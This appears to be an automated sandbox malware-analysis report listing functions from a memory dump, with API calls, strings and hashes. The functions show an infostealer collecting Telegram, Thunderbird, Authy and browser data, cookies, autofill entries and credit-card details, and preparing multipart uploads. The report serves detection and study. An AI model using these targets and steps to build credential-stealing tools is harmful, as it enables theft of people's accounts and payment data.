Opcode ID: e1cd21aa4b02c6298cb15996f87961eba4a44cdbc999e19e9171f47c45089922
Instruction ID: 4e9fe46b64a5a68344a2cd1d8430ce8f56eab6cb6f9070305da0805329ea0935
Opcode Fuzzy Hash: e1cd21aa4b02c6298cb15996f87961eba4a44cdbc999e19e9171f47c45089922
Instruction Fuzzy Hash: 6CA17171500208BFEB11EFA5CC85EEE77ACEB54704F40083EF902A71C1DBB99A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 00456340, Relevance: 37.5, APIs: 2, Strings: 19, Instructions: 735COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004566CD
_memmove.LIBCMT ref: 004567D3

Strings

table %s may not be indexed, xrefs: 004564B2
sqlite_autoindex_%s_%d, xrefs: 0045658D
there is already a table named %s, xrefs: 0045652F
sqlite_master, xrefs: 004565B5, 004565C0, 00456ACB
conflicting ON CONFLICT clauses specified, xrefs: 004569DE
cannot create a TEMP index on non-TEMP table "%s", xrefs: 0045642F
name='%q' AND type='index', xrefs: 00456B23
sqlite_, xrefs: 0045647A
index %s already exists, xrefs: 00456554
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);, xrefs: 00456AEA
BINARY, xrefs: 004567F7, 004568FC
CREATE%s INDEX %.*s, xrefs: 00456AAD
sqlite_temp_master, xrefs: 004565AE, 00456AC4, 00456AE0
UNIQUE, xrefs: 00456AA2
altertab_, xrefs: 0045649F
views may not be indexed, xrefs: 004564C2
virtual tables may not be indexed, xrefs: 004564CF
index, xrefs: 004563E4
table %s has no column named %s, xrefs: 004568AA

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);$altertab_$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$index$index %s already exists$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s has no column named %s$table %s may not be indexed$there is already a table named %s$views may not be indexed$virtual tables may not be indexed
API String ID: 4104443479-1477264830
Opcode ID: 43a322af5515caaf671fcef77fa13623a4ffdb1e3fe282bf7b07dfdbdf5a6790
Instruction ID: 7df5abb7e72dea23ae150f69680e5c92613175fc996472ae77846fc8e6b4dd78
Opcode Fuzzy Hash: 43a322af5515caaf671fcef77fa13623a4ffdb1e3fe282bf7b07dfdbdf5a6790
Instruction Fuzzy Hash: 7B528F71A00219AFCF14DF69C881AAEBBF1EF08315F55405AEC05AB352D739ED85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414DAB, Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 00414DB0

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 00414747: __EH_prolog3_catch_GS.LIBCMT ref: 00414751

__wgetenv.LIBCMT ref: 00414E55

Part of subcall function 00468D4A: _strnlen.LIBCMT ref: 00468D7F
Part of subcall function 00468D4A: __lock.LIBCMT ref: 00468D90
Part of subcall function 00468D4A: __getenv_helper_nolock.LIBCMT ref: 00468D9D

__wgetenv.LIBCMT ref: 00414F09

Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414A32
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414A42
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B47
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B5A
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B7D
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B8E
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414BB2
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414BBE

Part of subcall function 0040F96F: OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,0049B0CC,00000000,?,00414FC4), ref: 0040F994
Part of subcall function 0040F96F: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,0049B0CC,00000000,?,00414FC4), ref: 0040F9A4
Part of subcall function 0040F96F: CloseHandle.KERNEL32(00000000,?,?,?,0049B0CC,00000000,?,00414FC4), ref: 0040F9AB
Part of subcall function 0040F96F: _free.LIBCMT ref: 0040F9B9

Part of subcall function 00413BE0: __EH_prolog3.LIBCMT ref: 00413BFF
Part of subcall function 00413BE0: _memset.LIBCMT ref: 00413C29
Part of subcall function 00413BE0: lstrcatA.KERNEL32(?,?,?,0000001A,?,?,00000014), ref: 00413C4A
Part of subcall function 00413BE0: _memset.LIBCMT ref: 00413C55
Part of subcall function 00413BE0: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413C68
Part of subcall function 00413BE0: lstrcatA.KERNEL32(?,\Local State,?,?,?,?,?,00000014), ref: 00413C76

Part of subcall function 00413A4A: __EH_prolog3.LIBCMT ref: 00413A69
Part of subcall function 00413A4A: _memset.LIBCMT ref: 00413A93
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 00413AB4
Part of subcall function 00413A4A: _memset.LIBCMT ref: 00413ABF
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413AD2
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,004867F4,?,?,?,?,?,00000014), ref: 00413AE0
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 00413AEF

CreateDirectoryA.KERNEL32(00000000), ref: 004152E7
_memset.LIBCMT ref: 00415302
__wgetenv.LIBCMT ref: 0041530C
DeleteFileA.KERNEL32(00488C54,?,004866C4), ref: 004153AA
DeleteFileA.KERNEL32(00488C50,?,004866C4), ref: 004153B1

Part of subcall function 0041442A: __EH_prolog3.LIBCMT ref: 00414449
Part of subcall function 0041442A: __wgetenv.LIBCMT ref: 00414455
Part of subcall function 0041442A: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 00414501
Part of subcall function 0041442A: CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 00414538

Part of subcall function 0040E962: _memset.LIBCMT ref: 0040E983
Part of subcall function 0040E962: GetVersionExA.KERNEL32(?), ref: 0040E99C

Part of subcall function 00412190: LoadLibraryA.KERNEL32 ref: 004121C1
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 004121E2
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 004121F0
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 004121FE
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 0041220C
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 0041221A

Strings

APPDATA, xrefs: 00414DAB, 00415307
*.cookie, xrefs: 00414EC6
LOCALAPPDATA, xrefs: 00414E50, 00414F04
D877F783D5D3EF8C*, xrefs: 0041536B
key_datas, xrefs: 00415353
map*, xrefs: 0041537D
*.txt, xrefs: 00414E21, 00414F6D
\Thunderbird\Profiles\, xrefs: 004152B2
CryptoTab Browser, xrefs: 0041526C
\CryptoTab Browser\User Data\, xrefs: 00415271
Thunderbird, xrefs: 004152AD
\Telegram Desktop\, xrefs: 00415348

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$lstrcat$_memset$AddressProc__wgetenv$H_prolog3$CreateDirectory$DeleteFileProcess_memmove$CloseH_prolog3_catch_HandleLibraryLoadOpenTerminateVersion__getenv_helper_nolock__lock_free_strnlen
String ID: *.cookie$*.txt$APPDATA$CryptoTab Browser$D877F783D5D3EF8C*$LOCALAPPDATA$Thunderbird$\CryptoTab Browser\User Data\$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*
API String ID: 2957431141-3347235640
Opcode ID: a87791e2d345e23b6844a243f8d4becbc291deafe6820b312ea54c8cd01a1b79
Instruction ID: 5f3eaf53055c4b8f83347f078811056876cc6a46163f3b24e07ec08fd0e81f75
Opcode Fuzzy Hash: a87791e2d345e23b6844a243f8d4becbc291deafe6820b312ea54c8cd01a1b79
Instruction Fuzzy Hash: 96F16070904244AFDF06FF66DD569AD3F66BFA4309B04003FF802272A1DABA4A54DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00412B76, Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 173filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00412BC8
lstrcatA.KERNEL32(?,\temp), ref: 00412BDA
CopyFileA.KERNEL32 ref: 00412BEA
_memset.LIBCMT ref: 00412BF7
_sprintf.LIBCMT ref: 00412C09
DeleteFileA.KERNEL32(?), ref: 00412D78

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 00412CAB
_fprintf.LIBCMT ref: 00412CB2

Part of subcall function 0046835C: __lock_file.LIBCMT ref: 004683A3
Part of subcall function 0046835C: __stbuf.LIBCMT ref: 00468427
Part of subcall function 0046835C: __output_l.LIBCMT ref: 00468437
Part of subcall function 0046835C: __ftbuf.LIBCMT ref: 00468441

_fprintf.LIBCMT ref: 00412CBE
_fprintf.LIBCMT ref: 00412CC5
_fprintf.LIBCMT ref: 00412CD6
_fprintf.LIBCMT ref: 00412CDD

Part of subcall function 00412474: __EH_prolog3_GS.LIBCMT ref: 0041247B
Part of subcall function 00412474: _memset.LIBCMT ref: 004124D6
Part of subcall function 00412474: LocalAlloc.KERNEL32 ref: 00412511

_fprintf.LIBCMT ref: 00412D21

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

_fprintf.LIBCMT ref: 00412D3D

Strings

Month: %s, xrefs: 00412CB8
\temp, xrefs: 00412BCE
Year: %s, xrefs: 00412CD0
CC\%s_%s.txt, xrefs: 00412C03
Name: %s, xrefs: 00412CA2
Card: %s, xrefs: 00412D15

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File_memset$AllocCopyCurrentDeleteDirectoryH_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memmove_sprintflstrcat
String ID: CC\%s_%s.txt$Card: %s$Month: %s$Name: %s$Year: %s$\temp
API String ID: 3490499488-3508537252
Opcode ID: 2396dbf9ee3e1e3d0eafdaa860f3d2f4b5cbe97e5fb546f5e64c096204eadefe
Instruction ID: 91c911e916729c436df81f36103b2bca02794671e4c6e27571ba552f4cf11a64
Opcode Fuzzy Hash: 2396dbf9ee3e1e3d0eafdaa860f3d2f4b5cbe97e5fb546f5e64c096204eadefe
Instruction Fuzzy Hash: D6518272940208ABDF21ABA1DC42FDE77BCAF04708F20052FF904B7192EF7999458B59

Uniqueness

Uniqueness Score: -1.00%

Function 004128C0, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 228stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00412912
lstrcatA.KERNEL32(?,\temp), ref: 00412927
CopyFileA.KERNEL32 ref: 00412930
_memset.LIBCMT ref: 00412940
lstrcatA.KERNEL32(?), ref: 00412955
lstrcatA.KERNEL32(?,004867F4), ref: 00412963
lstrcatA.KERNEL32(?,?), ref: 0041296F
lstrcatA.KERNEL32(?,00488A04), ref: 0041297D
lstrcatA.KERNEL32(?,?), ref: 00412989
lstrcatA.KERNEL32(?,.txt), ref: 00412997
DeleteFileA.KERNEL32(?), ref: 00412B58

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

lstrcatA.KERNEL32(?), ref: 00412A76
lstrcatA.KERNEL32(?), ref: 00412AA0
lstrcatA.KERNEL32(?,004886F4), ref: 00412AB5
_fprintf.LIBCMT ref: 00412B04
_fprintf.LIBCMT ref: 00412B20

Strings

\temp, xrefs: 0041291E
%s%s%s%s%s%s%s, xrefs: 00412AFC
.txt, xrefs: 0041298B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
String ID: %s%s%s%s%s%s%s$.txt$\temp
API String ID: 1987428508-1558371589
Opcode ID: 81c4911eac8a4a4a0438bb6619e481cf43ca5f1724d55685de3ee5b37c5e38da
Instruction ID: 7ce8129a2802f398fc72dbf2ef0ab1cff2e98d7b49b8b5524b4d8ca9a7786b49
Opcode Fuzzy Hash: 81c4911eac8a4a4a0438bb6619e481cf43ca5f1724d55685de3ee5b37c5e38da
Instruction Fuzzy Hash: 1B718072D00248AFEF20AFE5DC41FDEBBB9EF04304F10042AF504EB1A1EA7999549B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E237, Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 196fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040E23E
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000006C,0040C825,logs,?,00000001,?,00000001), ref: 0040E261
GetFileSize.KERNEL32(00000000,00000000,?,00000001), ref: 0040E275
CloseHandle.KERNEL32(?,?,00000001), ref: 0040E286

Strings

", xrefs: 0040E3E5
"; filename=", xrefs: 0040E3C5
Content-Disposition: form-data; name=", xrefs: 0040E3AF
Content-Type: , xrefs: 0040E3F1
tiff, xrefs: 0040E36E
image/jpeg, xrefs: 0040E333
gif, xrefs: 0040E33A
image/png, xrefs: 0040E367
image/gif, xrefs: 0040E34D
jpg, xrefs: 0040E319
image/tiff, xrefs: 0040E37E
., xrefs: 0040E2FF
png, xrefs: 0040E354

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateH_prolog3_HandleSize
String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 3151384386-4065671631
Opcode ID: d43d5df8090efd71ded8e5e8e1372e92f45a11b09b3af872d3700a9dd59e51b5
Instruction ID: 5f9dc999d8e4efecb811950ffe2a50289651f9179956f6ace4097c70ae0cad71
Opcode Fuzzy Hash: d43d5df8090efd71ded8e5e8e1372e92f45a11b09b3af872d3700a9dd59e51b5
Instruction Fuzzy Hash: 6F618F31F44308AADB10EBA5C891EEEB7B8AF54B04F10452FF502B71C2DB785A49CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00414747, Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 413COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00414751

Part of subcall function 00404DBE: __EH_prolog3.LIBCMT ref: 00404DC5

Part of subcall function 004625F7: __EH_prolog3_GS.LIBCMT ref: 00462601
Part of subcall function 004625F7: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF5D,?), ref: 0046263A
Part of subcall function 004625F7: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626CB

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

Part of subcall function 0040326C: std::_Xinvalid_argument.LIBCPMT ref: 00403286

_fprintf.LIBCMT ref: 00414A32
_fprintf.LIBCMT ref: 00414A42
_fprintf.LIBCMT ref: 00414AA5
_fprintf.LIBCMT ref: 00414AB5
_fprintf.LIBCMT ref: 00414AF8
_fprintf.LIBCMT ref: 00414B27
_fprintf.LIBCMT ref: 00414B37
_fprintf.LIBCMT ref: 00414B47
_fprintf.LIBCMT ref: 00414B5A
_fprintf.LIBCMT ref: 00414B7D
_fprintf.LIBCMT ref: 00414B8E
_fprintf.LIBCMT ref: 00414BB2
_fprintf.LIBCMT ref: 00414BBE
_fprintf.LIBCMT ref: 00414BE7
_fprintf.LIBCMT ref: 00414BF7

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

FALSE, xrefs: 00414A37, 00414AAA, 00414B2C, 00414B4F

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$ByteCharFileFindMultiWide_memmove$FirstH_prolog3H_prolog3_H_prolog3_catch_NextXinvalid_argumentstd::_
String ID: FALSE
API String ID: 1663285408-4287395501
Opcode ID: 44a1ec462830f477418d8046bd11bf3d3bf45db8058350e6f9ab0a74b709057e
Instruction ID: 1637e8c4a4832394d7d9e27fab7e908c34394cd2b1fbd05082f64e739c0d9bda
Opcode Fuzzy Hash: 44a1ec462830f477418d8046bd11bf3d3bf45db8058350e6f9ab0a74b709057e
Instruction Fuzzy Hash: 93F16CB1804218AADB24EB59DD91FEEB778AF51304F1041EFE10AB2181EB745EC4DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0045EFEC, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 185registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0045F00E

Part of subcall function 00411D0F: __EH_prolog3.LIBCMT ref: 00411D16

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000001,00000000,00000000,00000003,00000001,004866C4,00000000,000000CC), ref: 0045F08C
RegEnumKeyExA.KERNEL32(?,?,?,0000000F,00000000,00000000,00000000,00000000), ref: 0045F0D9
wsprintfA.USER32 ref: 0045F100
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0045F114
RegCloseKey.ADVAPI32(?), ref: 0045F121
RegCloseKey.ADVAPI32(?), ref: 0045F12A

Part of subcall function 00411D79: __EH_prolog3.LIBCMT ref: 00411D80

Strings

DisplayName, xrefs: 0045F145
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0045F069, 0045F06E, 0045F0F1, 0045F0F6
DisplayVersion, xrefs: 0045F183
%s\%s, xrefs: 0045F0FA

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseH_prolog3Open$EnumH_prolog3_catch_memmovewsprintf
String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 951852247-3586320934
Opcode ID: 21ea5fc5b02d816784c2fccd1b8d3c420a5965d31bd123e2f97969e31a39b6bf
Instruction ID: a6d70bf56b8a510df44a81cb25e35a6ae6e07f0f0a97d699acee502c4b1abd0f
Opcode Fuzzy Hash: 21ea5fc5b02d816784c2fccd1b8d3c420a5965d31bd123e2f97969e31a39b6bf
Instruction Fuzzy Hash: 31611FB280014DAFDB14EFD1DC85EEEBBBCEB18304F10447BFA05A6151DB385A498B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041442A, Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 240fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00414449
__wgetenv.LIBCMT ref: 00414455

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004625F7: __EH_prolog3_GS.LIBCMT ref: 00462601
Part of subcall function 004625F7: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF5D,?), ref: 0046263A
Part of subcall function 004625F7: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626CB

CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 00414501
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 00414538

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

CopyFileW.KERNEL32(00000000,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00414667

Strings

APPDATA, xrefs: 0041444E
\files\Soft, xrefs: 004144DC
\Authy Desktop\Local Storage\, xrefs: 0041460D
\files\Soft\Authy, xrefs: 00414517
files\Soft\Authy, xrefs: 0041454D
\Authy Desktop\Local Storage\*.localstorage, xrefs: 00414487

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ByteCharCreateDirectoryFindH_prolog3MultiWide$CopyFirstH_prolog3_Next__wgetenv
String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\files\Soft$\files\Soft\Authy$files\Soft\Authy
API String ID: 2019322786-2614104896
Opcode ID: c84ff705d4cc009a16346d4ea3c061a2c9995160962c8d340f0355ee02656293
Instruction ID: b37ebf5b85b8fef535ef3d422051867b4bb99f4d020c96e9198faaebce568709
Opcode Fuzzy Hash: c84ff705d4cc009a16346d4ea3c061a2c9995160962c8d340f0355ee02656293
Instruction Fuzzy Hash: 999150B1800148EFDB25EFA4CD85EEE777CAF55308F00416EB809AB181EA785B04DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED4B, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 112filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040ED8B
lstrcatA.KERNEL32(?,\temp), ref: 0040ED9D
CopyFileA.KERNEL32 ref: 0040EDAD
_memset.LIBCMT ref: 0040EDBB
_sprintf.LIBCMT ref: 0040EDCD
DeleteFileA.KERNEL32(?), ref: 0040EE88

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 0040EE48
_fprintf.LIBCMT ref: 0040EE53

Strings

\temp, xrefs: 0040ED91
%s%s, xrefs: 0040EE42
Autofill\%s_%s.txt, xrefs: 0040EDC7

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset_sprintflstrcat
String ID: %s%s$Autofill\%s_%s.txt$\temp
API String ID: 2288810340-2986410175
Opcode ID: adcc6ed10b163b898c6100ad2b105619f1f7037777f09eb332604764768072c5
Instruction ID: cbeb1ee45e60e281374ad0e2034c1c800f98a584e3b24c66d511856a5f9fae5f
Opcode Fuzzy Hash: adcc6ed10b163b898c6100ad2b105619f1f7037777f09eb332604764768072c5
Instruction Fuzzy Hash: 21319372904108AEEF30AFB2DC45EDF77ACAF05704F20052FF504B3152EA395A558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEA6, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040EEE6
lstrcatA.KERNEL32(?,\temp), ref: 0040EEF8
CopyFileA.KERNEL32 ref: 0040EF08
_memset.LIBCMT ref: 0040EF16
_sprintf.LIBCMT ref: 0040EF28
DeleteFileA.KERNEL32(?), ref: 0040EFD2

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 0040EF9D

Strings

\temp, xrefs: 0040EEEC
History\%s_%s.txt, xrefs: 0040EF22
%s, xrefs: 0040EF97
SELECT url FROM urls, xrefs: 0040EF4F

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
API String ID: 440339207-2199967400
Opcode ID: 859e09215009610e198642e590b9aa17e9bd0646ac73971eba97985cbb47cf90
Instruction ID: c4c523648f7c9ddd10085a75586f10a9fc81ac4fe7dcbaa1423c284c77170ff7
Opcode Fuzzy Hash: 859e09215009610e198642e590b9aa17e9bd0646ac73971eba97985cbb47cf90
Instruction Fuzzy Hash: EB318372944108AEEB30AFB2DC45EDE776CEF05714F20042FF505F2152EA399A558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFF0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F030
lstrcatA.KERNEL32(?,\temp), ref: 0040F042
CopyFileA.KERNEL32 ref: 0040F052
_memset.LIBCMT ref: 0040F060
_sprintf.LIBCMT ref: 0040F072
DeleteFileA.KERNEL32(?), ref: 0040F122

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 0040F0ED

Strings

\temp, xrefs: 0040F036
Downloads\%s_%s.txt, xrefs: 0040F06C
%s%s, xrefs: 0040F0E7

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s%s$Downloads\%s_%s.txt$\temp
API String ID: 440339207-2902098628
Opcode ID: 575470fcddeb759c1383798cef9d139b450044048b4322df54ce0c46a927228a
Instruction ID: 63e679a688cb4e1223aa7c6d4bcbf1b9909be065fca5b70f9b9156e32280bbec
Opcode Fuzzy Hash: 575470fcddeb759c1383798cef9d139b450044048b4322df54ce0c46a927228a
Instruction Fuzzy Hash: 05316272944208AEEF30ABB1DC45EDF77ACAF05714F20053FF509B7152EA3999448B69

Uniqueness

Uniqueness Score: -1.00%

Function 004047F3, Relevance: 16.7, APIs: 11, Instructions: 152stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004047FD

Part of subcall function 0040D995: _memset.LIBCMT ref: 0040D9A3
Part of subcall function 0040D995: _strcpy_s.LIBCMT ref: 0040D9B9
Part of subcall function 0040D995: _memset.LIBCMT ref: 0040D9D4

_memset.LIBCMT ref: 00404831
_memset.LIBCMT ref: 0040483F
_strtok.LIBCMT ref: 00404865
lstrcatA.KERNEL32(?,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404889
lstrcatA.KERNEL32(?,00000000,?,00000010,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 004048AF
lstrcatA.KERNEL32(?,00000001,00000000,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 004048CC
lstrcatA.KERNEL32(?,?,00000000,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404902
lstrcatA.KERNEL32(?,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404911
ShellExecuteA.SHELL32(00000000,00000000,?,004866C4,00000000,00000000), ref: 004049C1

Part of subcall function 0040DA1F: _memset.LIBCMT ref: 0040DA29

_strtok.LIBCMT ref: 004049DA

Part of subcall function 004688ED: __getptd.LIBCMT ref: 0046890B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memsetlstrcat$_strtok$ExecuteH_prolog3_Shell__getptd_strcpy_s
String ID:
API String ID: 230071149-0
Opcode ID: d5ad8f808d0b2734b57b4ef2c43003ee14d232df8916db86ffe9fd693c606024
Instruction ID: 484bb8ec39e8ebd3d6e6f9a4084da350e7f74f481ce95393aa71437f7627f88b
Opcode Fuzzy Hash: d5ad8f808d0b2734b57b4ef2c43003ee14d232df8916db86ffe9fd693c606024
Instruction Fuzzy Hash: B6515EB180015CAEDB25EB61CD89FDE777CEB54308F0005EAA109A3191EB786F88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDDE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 239networkfileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040DDFD
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040DE37
InternetReadFile.WININET(00000010,?,000003E8,?), ref: 0040DE51
_memmove.LIBCMT ref: 0040DE86
_memset.LIBCMT ref: 0040DEB7
HttpQueryInfoA.WININET(00000010,0000001D,?,?,00000000), ref: 0040DECD
_memcpy_s.LIBCMT ref: 0040DFFC
_memcpy_s.LIBCMT ref: 0040E024

Strings

text, xrefs: 0040DF5A

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInternet_memcpy_s$H_prolog3HttpInfoPointerQueryRead_memmove_memset
String ID: text
API String ID: 1895411410-999008199
Opcode ID: 29559fd7c0f8bfea2aed922a597313acc32ca1d562e348907443a2dd625172d6
Instruction ID: 623bac6b6825a502e6a2054dcebc08deb5fb4c8a3fc0d349ec666da5264729df
